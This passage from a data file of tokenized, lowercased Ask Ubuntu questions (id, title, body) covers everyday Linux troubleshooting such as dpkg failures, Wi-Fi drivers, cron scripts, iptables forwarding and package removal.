( 5.5.29-0ubuntu0.12.04.1 ) ... setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.04.1 ) ... invoke-rc.d : initscript mysql , action `` start '' failed . invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : no apport report written because the error message indicates its a followup error from a no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server i have tried several things over the past week and can not get this to resolve , any assistance would be appreciated . i did notice the message : package mysql-server-5.5 is not configured yet . and i have yet to get this configured so i am working on that aspect . any other assistance will be very appreciated .
261252	how do i change the user transmission runs under ?	i installed transmission through a ppa and the daemon starts on boot . i want to change the user that runs the daemon because i want the downloaded files to be under the same user as my xbmc installation , and i ca n't seem to find where to edit that . the daemon uses upstart so there is nothing about which users runs it in /etc/init.d/transmission-daemon and there is n't anything in /etc/default/transmission-daemon about the user either i 'm using these ppas for transmission : /etc/apt/sources.list.d/transmissionbt-ppa-quantal.list : deb //ppa.launchpad.net/transmissionbt/ppa/ubuntu quantal main /etc/apt/sources.list.d/transmissionbt-ppa-quantal.list : deb-src //ppa.launchpad.net/transmissionbt/ppa/ubuntu quantal main /etc/apt/sources.list.d/transmissionbt-ppa-quantal.list.save : deb //ppa.launchpad.net/transmissionbt/ppa/ubuntu quantal main /etc/apt/sources.list.d/transmissionbt-ppa-quantal.list.save : deb-src //ppa.launchpad.net/transmissionbt/ppa/ubuntu quantal main
261253	i would like to build a partial mirror , i like the look of debpartial-mirror , but it looks abandonded , recommendations for a mirror tool ?	i would like to build a partial mirror , i like the look of debpartial-mirror , but it looks abandonded , recommendations for a mirror tool ? https : //projetos.ossystems.com.br/wiki/debpartial-mirror i choose debpartial-mirror because i can mirror only sections and subsections . other tools such as debmirror and apt-mirror did not seem to have this functionality . i 've read http : //wiki.debian.org/howtosetupadebianrepository does anyone have other recommendations for a partial mirror ? can you tell me what happened to debpartial-mirror ?
261254	a strange issue with ping6 using the 2001 : db8 : address	i have 2 ubuntu machines one acting as ipv6 wireless router ( running hostap and radvd on wlan0 ) and the other is connected to that router . the router wlan0 interface has the address 2001 : db8:1:1 : :1/64 and the host has the address 2001 : db8:1:1 : :2/64 on wlan0 which is connected to ap1 provided by the router . on wireshark , i can see the router advertisements at the router and the host . when i ping 2001 : db8:1:1 : :2 at the router it says that `` destination unreachable : address unreachable '' and i can see the neighbour solicitation and advertisement messages exchange . when i ping 2001 : db8:1:1 : :1 at the host it says the same `` destination unreachable : address unreachable '' and i can see the neighbour solicitation message only any idea ? also , i have tried to do the following into the router sudo ip -6 neigh add 2001 : db8:1:1 : :2 lladdr 64:50:03 : ec : cc : ss dev wlan0 and this into the host sudo ip -6 neigh add 2001 : db8:1:1 : :1 lladdr 64:50:03 : ec : cc : ff dev wlan0 then , when i ping i can see the echo request and reply exchange in wireshark only but i can not see that at the command line , rather it says no packets have been received ! ! ! thank you
261255	restoring android	i have a samsung galaxy nexus device . i tried the ubuntu touch out , but now i would like to go back to android . however , when i run the command sudo ./flash-all.sh i get the following message : sending 'bootloader ' ( 2308 kb ) ... okay [ 0.513s ] writing 'bootloader ' ... okay [ 0.292s ] finished . total time : 0.805s rebooting into bootloader ... okay [ 0.007s ] finished . total time : 0.008s sending 'radio ' ( 12288 kb ) ... okay [ 2.668s ] writing 'radio ' ... okay [ 1.372s ] finished . total time : 4.040s rebooting into bootloader ... okay [ 0.009s ] finished . total time : 0.009s archive does not contain 'boot.sig' archive does not contain 'recovery.sig' failed to allocate 435793780 bytes error : update package missing system.img i guess there must be other people out there with the same problem . anyone have a solution ? edit : i did manage to restore android on my samsung galaxy nexus . however i do not have an explanation why it did n't work the first few times . i tried installing it using different pcs . the last time it worked . i also downloaded the factory image more than once . if anyone knows what happened here you can still answer this question . i think it would be useful for other people . thanks , td
261263	removing ubuntu	so i installed ubuntu using the wubi windows installer however i 've decided to go back to windows 7 and was wondering how do i uninstall everything and go back to windows 7 ? i 've tried to run the uninstall-wubi.exe however the archiver manger opens up with a notification : an error occurred while loading the archive . and nothing happens . any ideas ? thanks ,
261272	how can i fix a broken eclipse installation in ubuntu 12.10 ?	it is a shot in the dark , but i have tried everything to reinstall eclipse . i did the normal apt-get install for eclipse . i used it for a year . and then i decided i wanted to select the `` upgrade option '' from the eclipse help menu . after 30 minutes of many downloads , i restarted eclipse and none of the perspectives worked . essentially , when i tried to upgrade through eclipse , nothing worked afterwards . i did the apt-get autoremove and many ways to remove from eclipse . i tried to remove eclipse through apt and also removed some /lib files . but everytime i install i end up at the same place , eclipse just wo n't work . i am sure there are residual files out there , i just do n't know where . ... when i download eclipse from the site , it works fine . i am ok with working this way but i thought i would ask if there is a way to fix the eclipse configuration that comes with ubuntu .
261273	is there a way to import my steam games from windows 7 to ubuntu ?	i 'm running ubuntu 12.04 alongside windows 7 , and although steam works just fine on ubuntu , it says that i need to reinstall my games if i wish to play while on ubuntu . rather than download my games again , is there a command where i can transfer my home directory for steam from windows to ubuntu ? is it even necessary ( example , will it save me any disk space by doing this or will it just be as intensive as downloading it from scratch ) ? any and all help would be appreciated .
261279	windows 8 dual boot on standard bios ( without uefi )	i am using old computer standard phoenix bios , it does not have uefi . i was installed windows 8 first , then ubuntu . when grub installed , i ca n't access windows 8 anymore . update-grub ca n't find my windows , bootrepair ca n't repair . after tried grub-customizer . grub customizer can find windows partition and added entry grub config . but windows 8 ca n't boot . grub menu gives this screen : also i tried fixmbr and rebuildbcd , they do not solve the problem . my bootinfo at http : //paste.ubuntu.com/5565925/ thanks !
261289	apt-get update will not work on my server	i 've just installed ubuntu server 12.04 on my spare box , and i 'm using a command line interface only to get my feet a little wet . ping google.com does work , so i know my connection is up and running . at first , sudo apt-get update gave me a 404 error , so i followed this advice and added those lines to my sources.list file . while i no longer get the 404 error , i now get many errors like the following one : err mirror : //mirrors.ubuntu.com precise-updates/restricted i386 packages no mirror file '/var/lib/apt/mirrors/mirrors.ubuntu.com_mirrors.txt ' found [ mirror : ] i get this error with /restricted , as in above , and also with /universe and /multiverse . i also get this error with precise-updates , as in above , and also with precise-backports and precise-security . i suppose this makes sense , since this is everything that was added into sources.list , but i have no idea where to go from here since searching yields nothing , or if the problem is on my end or theirs .
261292	how to get software update to automatically grab kernel source along with kernel update ?	i 'm running ubuntu 12.10 . for some reason , every time there 's a kernel update , it does not install the linux-headers-* and linux-header-*-generic into /usr/src anymore . so every time i update my virtual ubuntu in virtualbox , i have to manually install the kernel headers before running the guest additions package again . i 'm pretty sure 12.04 automatically installed kernel headers because i never had to do that before . how do i fix this ?
261296	need to run a .bin file , but same error keeps coming up	i have a .bin file that needs to run . i 'm trying to start it through the terminal , and i keep getting an error that says : lsb 3.0 or higher not found i ca n't get to than internet at my school without running the program . how can i get the lsb files so i can run the program ?
261298	postfix fatal : open lock file /var/lib/postfix/master.lock : can not open file : permission denied	i have recently installed postfix and while configuring the server have run into an issue . at one point i received the error from my syslog , fatal : open lock file /var/lib/postfix/master.lock : can not open file : permission denied i am logged in as root . on another forum i had the recommendation to remove the file master.lock and to run an apt-get update , then restart . i did these and log back in to find that my directory is empty . ls -l /var/lib/postfix/ total 0 i have then tried to purge the program by doing apt-get purge postfix as root and reinstalling the program . no matter what i do , i can not get the files back under /var/lib/postfix/ .
261301	how do i install unsettings in ubuntu 12.10 ?	when i try to install through my terminal i get this error : enyel @ alexandria : ~ $ sudo apt-get unsettings e : invalid operation unsettings enyel @ alexandria : ~ $ sudo apt-get install unsettings e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i already added the ppa and updated it , can anyone help ?
261303	why am i unable to connect to wireless networks ?	seems like a repeated question , but i am not able to find the answer within the question database , so i 'll begin with what adapter i have : lspci | grep network : 06:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) iwconfig eth1 : eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise edit 3 : wireless networks are detected , but unable to connect to any . edit 4 : i have dual booting into windows 7/xp and ubuntu , being both windows able to > connect normally to any wireless . connecting to multiple wep connections after configuring a shared wep key / after updates seems to have broken the authentication , and it always keeps asking out for the key even though it 's correct . i could connect to wireless perfectly with the base 12.04 installation with `` updates while installing '' . i have the jockey broadcom sta drivers activated . what 's wrong ? edit 4 : source of 1st edit : how to install broadcom / sta wireless card ( bcm43xx ) edit : bcmwl kernel source is already to the latest version ; linux-libc-dev , libc6-dev , linux-headers-generic , linux-headers are as well ; blacklisting does n't help either with ndiswrapper ; removing with modprobe is not working either edit 2 : reinstalling bcmwl-kernel-source , as stated in how do i get my bcm43228 card working in mainline kernel 3.4 or higher ? outputs : sudo apt-get install -- reinstall bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 0 b/1,301 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 185120 files and directories currently installed . ) preparing to replace bcmwl-kernel-source 6.20.155.1+bdcom-0ubuntu0.0.1 ( using ... /bcmwl-kernel-source_6.20.155.1+bdcom-0ubuntu0.0.1_i386.deb ) ... removing all dkms modules done . unpacking replacement bcmwl-kernel-source ... setting up bcmwl-kernel-source ( 6.20.155.1+bdcom-0ubuntu0.0.1 ) ... loading new bcmwl-6.20.155.1+bdcom dkms files ... building only for 3.2.0-38-generic-pae building for architecture i686 building initial module for 3.2.0-38-generic-pae done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-38-generic-pae/updates/dkms/ depmod ... . dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-38-generic-pae
261311	how to remove openjdk-7 ?	i want to uninstall java 7 and install the version 6 ( as some of programs i would like to use are incompatible with 7 ) . i tried : $ sudo apt-get remove openjdk-7-jre [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libatk-wrapper-java-jni : depends : libatk-wrapper-java ( > = 0.30.4-0ubuntu4 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . $ sudo dpkg -r openjdk-7-jre dpkg : dependency problems prevent removal of openjdk-7-jre : amd64 : default-jre depends on openjdk-7-jre ( > = 7~u3-2.1 ) . icedtea-7-plugin : amd64 depends on openjdk-7-jre . icedtea-netx : amd64 depends on openjdk-6-jre ( > = 6b23~pre10~ ) | openjdk-7-jre ; however : package openjdk-6-jre is not installed . package openjdk-7-jre : amd64 is to be removed . openjdk-7-jdk : amd64 depends on openjdk-7-jre ( = 7u15-2.3.7-0ubuntu1~12.10 ) . dpkg : error processing openjdk-7-jre : amd64 ( -- remove ) : dependency problems - not removing errors were encountered while processing : openjdk-7-jre : amd64 $ dpkg -l | grep icedtea ii icedtea-7-jre-jamvm : amd64 7u15-2.3.7-0ubuntu1~12.10 amd64 alternative jvm for openjdk , using jamvm ii icedtea-7-plugin : amd64 1.3-1ubuntu1.1 amd64 web browser plugin based on openjdk and icedtea to execute java applets ii icedtea-netx : amd64 1.3-1ubuntu1.1 amd64 netx - implementation of the java network launching protocol ( jnlp ) ii icedtea-netx-common 1.3-1ubuntu1.1 all netx - implementation of the java network launching protocol ( jnlp ) monkey @ icanseeyou : ~ $ dpkg -l | grep jre ii default-jre 1:1.7-43ubuntu3 amd64 standard java or java compatible runtime ii default-jre-headless 1:1.7-43ubuntu3 amd64 standard java or java compatible runtime ( headless ) ii icedtea-7-jre-jamvm : amd64 7u15-2.3.7-0ubuntu1~12.10 amd64 alternative jvm for openjdk , using jamvm ri openjdk-7-jre : amd64 7u15-2.3.7-0ubuntu1~12.10 amd64 openjdk java runtime , using hotspot jit ii openjdk-7-jre-headless : amd64 7u15-2.3.7-0ubuntu1~12.10 amd64 openjdk java runtime , using hotspot jit ( headless ) ii openjdk-7-jre-lib 7u15-2.3.7-0ubuntu1~12.10 all openjdk java runtime ( architecture independent libraries )
261313	how can i adjust my wifi settings ?	it seems that my realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) is only operating at `` b '' speeds . how can i kick it up a notch to `` n '' i just added a trendnet tew-731br to my home network and would really like to get quicker than 72mb/s thanks ( figured out that my module name is rtl8192ce . now looking for a configuration file . ) to save everyone else time : this thread : http : //ubuntuforums.org/showthread.php ? t=1604101 & page=1 is pretty useless if you already have the realtek driver installed and working at all . another suggestion , that of setting the ap to only `` n '' mode . has made no difference in bit rate , still 72mb/s
261323	usb memory card reader does not work	it appears : lsusb : bus 002 device 035 : id 05e3:0710 genesys logic , inc. usb 2.0 33-in-1 card reader but when i insert a mini sd card in the reader , nothing happens . how to solve this and read the card ?
261324	directory path for home to an external ntfs hard drive	ok , i have run into a problem with authentication and i think i have figured out the problem but i cant seem to find the solution anywhere i look . i am using ubuntu 12.04 running lamp ( individually installed and configured ) , proftpd , and webmin . i am setting up a website and one of the things it will offer is ftp based file management and backups . ive noticed i can login with any user created on the linux files system but the ftp users that i have created with their home directories based on the external ntfs had get a constant error 530 . i 've played with permissions a lot but i do n't wont to let them free of their root bindings . i saw a clue in another post : '' instead of messing with mount points , you can create a link to /media/300gb/documents like this : ln -s /media/300gb/documents ~/documents '' ( which caught my eye , but the clue was a response to that ) '' mikewhatever 8,25311025 it is half-solution . it makes link in documents folder and path looks like ~/documents/documents â tilly willy may 9 '12 at 0:49 '' i am very new to all this and struggling to do this with as much research on my own as i can . when i checked my log files i saw notice : unable to use '~/ ' [ resolved to '/media/ftp1/ftp/skittishtrigger/ ' ] : permission denied preparing to chroot to directory '~/' chroot to '~/ ' failed for user 'skittishtrigger ' : operation not permitted error : unable to set default root directory ftp session closed . so i guess the question is how can i define a path to a external /home that is n't defined by a leading ~/ ? ( without having to reformat external drive to ext3/4 )
261326	is it safe to chown `/usr/local` ?	i know what /usr/local is for - installing software for the local machine . by default , root owns the directory . this means that to install there , you need to use sudo . for a single-user or developer machine , this seems like unnecessary extra use of the command . hence , my question - is it safe for me to own /usr/local ? for example , homebrew for os x `` just works '' because they own /usr/local and safely install their software there without the use of sudo . additionally , if you have locally compiled software installed to /usr/local , the software currently needs root to modify themselves or install plugins . this seems unsafe - i want to only use sudo when i know exactly what will happen . opinions ?
261329	package for ruby 2.0 on precise	has there been any news from the maintainers of ubuntu packaging of ruby as to whether they 'll be releasing a package for ruby 2.0 ? if so , have they indicated whether they 'll be releasing any packages for ruby 2.0 on 12.04 ?
261332	no network on ubuntu server after changing the modem	i upgraded my internet connection , and after changing the modem my ubuntu server 's eth0 does n't come up . i looked at /etc/netwrork/interfaces , it looks all normal eth0 is set to auto and dhcp # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp in the boot process right after ubuntu starts to run , the lights for the port to which the cable is connected to stops blinking as if no cable is connected to it . and that 's when ubuntu is trying to configure `` virtual network devices '' . it then tries to configure the network devices a couple of times taking about 2 minutes , then it says `` booting system without full network configuration '' . dmesg | grep eth , shows two eth0 : link downs , and one eth0 : link is not ready . when i do ifconfig i do n't get an ip .
261334	how to collect laptop hardware information ?	so i 'm entering the business of buying and selling laptops . for me , it 's convenient to boot up a laptop in ubuntu to see some of the hardware still works . the screen , hard drive , wifi , bluetooth , yadda yadda . i think this may come across as a software/library shopping question , but i will fire it off anyways . so , i want to go collect hardware information on a per laptop basis and store it somewhere . i can use this to debug or figure out hardware issues after something is already sold . it would also be useful to see which hardware is particularly common or buggy and avoid those . or provide proper support for them . i have been using linux for a while , so i know of lshw -html and inxi . is that all i need , or are there any supplementary programs ? it would be useful to know the bios versions of various laptops too , if i can query that sort of thing . does lshw report correctly on computers that have poorly supported hardware ? edit : i should add that i would like additional information that may be available , like how many hours the screen has seen , smart info on hard drives , or anything else that may be logged . this will vary greatly from laptop to laptop , but some laptops do keep track of useful information . the firmware in thinkpad batteries keep track of how many hours they 've been used , recharged , current capacity , and other jazz like that . it would be very useful for me to have a huge datadump of information like this . for extra stuff , it would be nice to have performance tests on the usb ports , hard drives , graphics card , testing battery life , etc . i do n't mind whipping up the tests myself , but if there was a starting point out there , that 'd be fairly useful to build on top of . no need reinventing the wheel , afterall . edit 2 : in addition to lshw and inxi , it seems like there are other useful tools , like hwinfo and hardinfo . hardinfo does n't have a command-line only mode , but it can also be used to generate reports . these are good enough to suffice for now . thanks .
261339	cron not working	wrote a short shell script `` wallch.sh '' to randomly change my desktop background : dir= '' /home/user/wallpapers '' pic= $ ( ls $ dir/*.jpg | shuf -n1 ) fil= '' file : // '' gsettings set org.gnome.desktop.background picture-uri $ fil $ pic and copied it to /bin/ , then sudo chmod 755 /bin/wallch.sh to it . this could easily run from terminal smoothly without any error . however when i add a line in crontab ( doing this from terminal as user ) , like : * * * * * /bin/wallch.sh it just would n't run . theoretically it should have run every minute . /var/log/syslog says : feb 25 19:36:01 user-ubuntu cron [ 11762 ] : ( user ) cmd ( /bin/wallch.sh # job_id_3 ) feb 25 19:36:01 user-ubuntu cron [ 11761 ] : ( cron ) info ( no mta installed , discarding output ) feb 25 19:37:01 user-ubuntu cron [ 11790 ] : ( user ) cmd ( /bin/wallch.sh # job_id_3 ) feb 25 19:37:01 user-ubuntu cron [ 11789 ] : ( cron ) info ( no mta installed , discarding output ) feb 25 19:38:01 user-ubuntu cron [ 11828 ] : ( user ) cmd ( /bin/wallch.sh # job_id_3 ) feb 25 19:38:01 user-ubuntu cron [ 11827 ] : ( cron ) info ( no mta installed , discarding output ) any suggestions ? update : the script i wrote ( please note that i changed the file name , now it is /bin/wallch . also , i removed the comment lines beginning with # except the shebang ) : # ! /bin/sh dir= '' /home/user/wallpapers '' pic= $ ( ls $ dir/*.jpg | shuf -n1 ) fil= '' file : // '' gsettings set org.gnome.desktop.background picture-uri $ fil $ pic the stat /bin/wallch output : user @ user-ubuntu : ~ $ stat /bin/wallch file : `/bin/wallch' size : 484 blocks : 8 io block : 4096 regular file device : 806h/2054d inode : 130389 links : 1 access : ( 4755/-rwsr-xr-x ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2013-02-26 11:03:01.727198732 -0600 modify : 2013-02-26 10:37:46.727135926 -0600 change : 2013-02-26 11:02:06.215196433 -0600 birth : - user @ user-ubuntu : ~ $ thanks for any answers !
261342	unable to add facebook account	recently my facebook account stopped working with ubuntu . it was showing up as being unverified , and when i tried pressing the `` grant access '' button , it just opened up a page on firefox that just contained the plaintext , `` success '' . the url was something about a successful facebook login . i tried removing the account and re-adding it , but the same thing happened and it failed to add . any idea what 's going on and how to resolve this ?
261346	how to change permanently the path with ubuntu 12.04 lts ?	to add : /usr/local/go/bin to the path with ubuntu 10.04 lts ( lucid ) and permanently change the path , i just edited the files /etc/environment and /etc/login.defs . and these modifications were ok both for my current user account and my root account . i.e . echo $ path returned the modified path for my user account as well as for the root account when using sudo -i or su . however , this does n't work anymore with ubuntu 12.04 lts when doing the same modifications if using sudo -i ! meanwhile , this works when using su ! what should i explicitly modify to get permanently that same behavior with precise pangolin when using sudo -i ?
261349	disable automatic ipod scrobbling through rhythmbox	i 'm on ubuntu 12.10 , rhythmbox 2.97 . i use rhythmbox to manage my ipod , so far so good . but every time i plug it in , what i 've listened on my ipod to get scrobbled to last.fm automatically . i wish to disable that ( but keep the regular scrobbling functionality ) , but am having a tough time figuring out how . any ideas ?
261351	iptables forwarding all excluding local server	these are the rules i am using : iptables -- flush iptables -- table nat -- flush iptables -- delete-chain iptables -- table nat -- delete-chain iptables -- table nat -- append postrouting -- out-interface wlan5 -j masquerade iptables -- append forward -- in-interface wlan3 -j accept i have wlan5 with 192.168.1.100 , and wlan3 with 10.0.0.1 . i make my laptop a wifi repeater with 2 wifi cards . so people connect to wlan3 , the gateway is 10.0.0.1 , and everything redirects to wlan5 [ gw 192.168.1.1 ] . now , this is working great , except i can not access a local http server hosted on my laptop . it is hosted on my laptop , and it works as localhost , or 10.0.0.1 : $ curl -i 10.0.0.1 http/1.1 301 moved permanently date : tue , 26 feb 2013 02:35:32 gmt server : apache/2.2.22 ( ubuntu ) location : http : //10.0.0.1/index.php vary : accept-encoding content-type : text/html ; charset=iso-8859-1 ok , so here is where the problem comes up . a client on my sharing network [ wlan3 ] with ip 10.0.0.20 tries to access 10.0.0.1:80 and it can not connect : $ wget http : //10.0.0.1 connecting to 10.0.0.1 ( 10.0.0.1:80 ) wget : ca n't connect to remote host ( 10.0.0.1 ) : connection refused it can ping 10.0.0.1 and even ping external ip . so it has internet connection , which is the point , but it can not access the http , i believe because of the iptables rules . right after the error , i get this on my laptop syslog : feb 25 21:36:19 toshi kernel : [ 57806.285170 ] inbound in=wlan3 out= mac=9c : b7:0d : a5:45:67 : a8:26 : d9:3e:04:21:08:00 src=10.0.0.20 dst=10.0.0.1 len=60 tos=0x00 prec=0x00 ttl=64 id=28282 df proto=tcp spt=58343 dpt=80 window=65535 res=0x00 syn urgp=0 so the question is , how can i exclude forwarding ip requests to 10.0.0.1 not forward to wlan5 ? thanks
261363	screen resolution repositioning ? ( broken laptop screen )	i have a laptop with the top left corner 's screen being broken - i ca n't see anything there . however it 's just a small corner , so i 'd like to know if there 's something i can do to make ubuntu not use that part of the screen at all - i basically want it to ignore 2 unity taskbars on the left , and re-position all the content .
261365	ubuntu 12.10 doesnât recognize wi-fi but itâs been connected during installation	while installing ubuntu i connected it to my wi-fi network . but as installation finished i could n't connect to that same network again because ubuntu does n't see it . it does still see other networks but not mine . changing network name did not help nor did connecting to hidden wireless network . i 'm sure i 'm not alone having this issue but i could n't find the answer . i believe re-installation without connecting to wireless would help , but i want to solve it another way . i already did the steps below : clicking on the network manager icon . edit connections . find the wireless connection and delete it . try connecting again . and entering the next commands : sudo apt-get install linux-headers-generic sudo apt-get install -- reinstall bcmwl-kernel-source sudo modprobe wl but still it does n't work .
261369	desktop client for google+ and hangout	is there any app that i can use to do google hangout from within my ubuntu desktop like skype ? also , how can i integrate google+ account with ubuntu ?
261374	frozen during install and music playing	i just installed ubuntu onto my laptop . it was successfully installing for a while , then it stopped . it said almost finished copying files , but it was stuck on the same spot for 10 minutes . bored , i decided to play around with the features already on the top bar . i clicked the audio button ( the microphone with the sound waves coming out ) . i clicked play , and the computer is now frozen . what do i do
261377	software updater stops not sure what to do	i 'm updating ubuntu 12.10 . its installing updates and stops at displaying a changelog . i 'm not sure how to get it to proceed through the install . it stops showing ( end ) at the end of the log .
261380	can i play the game do n't starve on ubuntu ?	i am new to ubuntu . bought an acer c7 chromebook yesterday and installed ubuntu 12.04 32-bit tonight . i have seen 1 or 2 web sites that make me think you can play the game do n't starve on ubuntu . i was reading something about having to play it in chrome with nacl enabled . i 've searched and searched with no answers ? ! is it possible ? and how ?
261384	error while installing addtional drivers ?	i am trying to install additional drivers on ubuntu 12.04 . the application is returning an error . in the log file i can see various nvidia module failed to load . however , my pc do not have nvidia graphics card . its intel card , then why is ubuntu searching for nvidia card ? i have installed ubuntu 12.04 and additional drivers before without any error . though this is the first time i am using windows installer version . i do n't know if its related to that .
261390	how do i disable resolutions above a certain level on ubuntu ?	i use a small tv as my computer monitor and my amd radeon hd 4200 video card is capable of outputting resolutions to a tv with as high a resolution as 1920x1080 . unfortunately ubuntu thinks this is my actual maximum and therefore native resolution ( my native resolution is 1366x768 on my tv ) this would n't normally be a problem except that my games in wine try and display at 1920x1080 which my tv does not handle well at all . i want to disable these higher resolutions in ubuntu so that my wine games stop trying to use them , how can i do this ?
261391	chrome 64 bit youtube videos grainy	not sure if this the right forum for this question . anyway in chrome browser , youtube videos are grainy as shown in this image . there seems to be no problem with other video sites requiring flash . also the youtube videos play fine in firefox . is this a known issue ? any workarounds ? ubuntu 12.10 x86_64 chrome 64 bit version 25.0.1364.97
261394	apache could not reliably determine server	apache can not fully determine domain name when i tried restarting after install . i get this error ; sudo /etc/init.d/apache2 restart *restarting web server config apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername . why i 'm i seeing 127.0.1.1 i have tried saving servername localhost into my /etc/init.d/apache2 but it keeps redirecting me to google search page everytime i type phpmyadmin . will appreciate an expert help ?
261398	videos downloading problem with multiget	i have installed multiget to my machine and i do n't know how to use it . i tried to download videos from youtube by pasting url to multiget but it did n't work . so what should i do now ?
261401	how to disable nautilus terminal ?	i see nautilus is getting slower in navigating when we have nautilus terminal loaded . is there any way we can disable it in a particular window ?
261407	how to save terminal history manually ?	it 's my understanding that the history file is updated when the terminal exits . but sometimes my computer crashes out , and the terminal does n't exit cleanly , and then i lose those commands from my history which is annoying . how can i make it flush immediately , so that the entries still go there even if my computer has a meltdown ? at the moment i 'm using this workaround , but i feel there should be a better way . i 'm using gnome-terminal on ubuntu 12.10 .
261416	stick with package version	is there a way to disable per-package updates ? i love clementine , but the 1.1 version removed a crucial feature . i 'd like to stick with the 1.0 version installed via a downloaded .deb package . can i somehow disable updates for it , or do i have to check the update manager every time ? the updated version is in the base sources of ubuntu , so i ca n't just remove a ppa .
261417	dvb-t and analog set top box based on linux based open harware and software	i want to build a dvb-t and analog set top box based on linux based open harware and software . i decided to use beagleboard xm running ubuntu linux . i just bought it so i 'm a newbie . are there any suggestions on which steps i have to follow to find an appropriate usb tv tuner ( containing remote control ) , drivers , libraries , tv player software and so on , or are there any ready to use open source solutions on the market ? it is also important for me to extract the channel the viewer watches . thanks a lot .
261421	wired internet is n't working	i would really appreciate help on this . alright , so after searching for while on why ubuntu was n't connecting to the internet , someone told me that it may be the chip i had . the only information i could find out about that was that i have a atheros gbe lan chip . after searching this , i could n't find anything that worked . i 'm using ubuntu 12.10 . i am fairly new to linux , so it 's quite possible a lot of the solutions do n't work due to that . thanks .
261424	how can i cut an amr audio file	i need to cut some portion of an amr file . is there any software to do so , like mp3 cutter ? . audacity not supporting it . [ update ] is it possible in audacity , using plugin or something ? . i like a cli program other than ffmpeg as it is not light weight .
261425	partitioning options	so far i 've always been using the simplest partitioning option possibile for my ubuntu installations : / ( ext4 ) 50 gb swap 2gb ( the size of the ram installed ) ntfs ( data ) - > the remaining gbs , with the idea , which never occurred , that maybe someday i 'll need windows again , so i 've kept my data in a ntfs partition to eventually access it also from windows . later on , i found out that with ext2fsd you can access your data partition from windows also if it is formatted as ext4 . now after reading this guide and others on the internet , i am about to make these changes : 1 ) ubuntu 12.04 lts notebook ( 100 gb hdd , no dual boot ) : / - > 15 gb /home - > 20 gb ( needed for some large programs such as caelinux , matlab , etc . ) /data ( ext4 ) - > all the remaining gbs swap - > 2 gb 2 ) ubuntu 12.10 netbook ( 320 gb hdd , windows dual boot , 3 gb ram ) / - > 20 gb /home - > 30 gb /data - > all the remaining gbs . meant to be accessible also from windows . swap - > 2gb ntfs - > 20 gb ( windows ) in this way i 'll be able to encrypt only the files in /home and not the ones in /data , right ? would the /data partition be accessible to someone who does n't know my ubuntu login password ? in future , could i install a new distro/release simply by formatting the `` / '' partition , without making any change and/or loosing any data in my /home and /data partitions , keeping all my files there ? ( of course i 'll back up all the files , but just for info ) what appens to my current encrypted /home folders ? will i be able to format them correctly without any space loss ( i.e. , an hidden backup/space allocation for my previously encrypted /home folders ) ? even if i am seldomly going to use windows , should the ntfs partition be the first one in my partitioning tree ?
261427	ubuntu touch running on android emulator	as ubuntu touch has an underlying android/cyanogenmod layer , i would like to ask if it 's possible with reasonable effort to run ubuntu on the android emulator which is part of the android sdk .
261430	failed 12.04 installation on w7 machine , how do i resolve this ?	i successfully installed 12.04 with wubi on a windows 7 machine . but after a restart , remaining installation process failed to work . about 2/3rds of the installation had completed.. how can i solve it ?
261434	how to resolve dpkg error while installing firefox ?	i needed to uninstall firefox 19 which was installed during the installation of ubuntu 12.04 , in order to downgrade the version so that i could install firefox add-on compatible to lower versions . but now my system 's broken . i tried to update , or upgrade , apt-get -f install , synaptic installation , or re-install firefox , ... but to no avail . terminal error reports : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : python-zope.app.content use 'apt-get autoremove ' to remove them . the following extra packages will be installed : firefox firefox-globalmenu suggested packages : latex-xft-fonts firefox-gnome-support the following new packages will be installed : firefox the following packages will be upgraded : firefox-globalmenu 1 upgraded , 1 newly installed , 0 to remove and 9 not upgraded . 1 not fully installed or removed . need to get 0 b/25.6 mb of archives . after this operation , 52.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 299890 files and directories currently installed . ) unpacking firefox ( from ... /firefox_20.0~b1+build2-0ubuntu0.12.04.1~mfn3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/firefox_20.0~b1+build2-0ubuntu0.12.04.1~mfn3_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/plugins ' , which is also in package google-talkplugin 3.13.2.0-1 processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/firefox_20.0~b1+build2-0ubuntu0.12.04.1~mfn3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix this ?
